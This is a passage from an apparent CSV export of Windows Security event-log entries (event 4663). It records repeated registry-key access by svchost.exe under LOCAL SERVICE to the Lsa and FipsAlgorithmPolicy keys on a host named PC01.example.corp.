12801 + 0 + 0x8020000000000000 + + + 452884 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452883 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452882 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452881 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452880 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452879 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452878 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452877 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452876 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452875 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452874 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452873 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452872 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452871 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452870 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452869 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452868 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452867 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452866 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452865 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452864 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452863 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452862 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452861 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452860 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452859 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452858 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452857 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452856 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452855 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452854 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452853 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452852 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452851 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452850 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452849 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452848 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452847 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452846 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452845 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452844 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452843 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452842 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452841 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452840 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452839 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452838 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452837 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 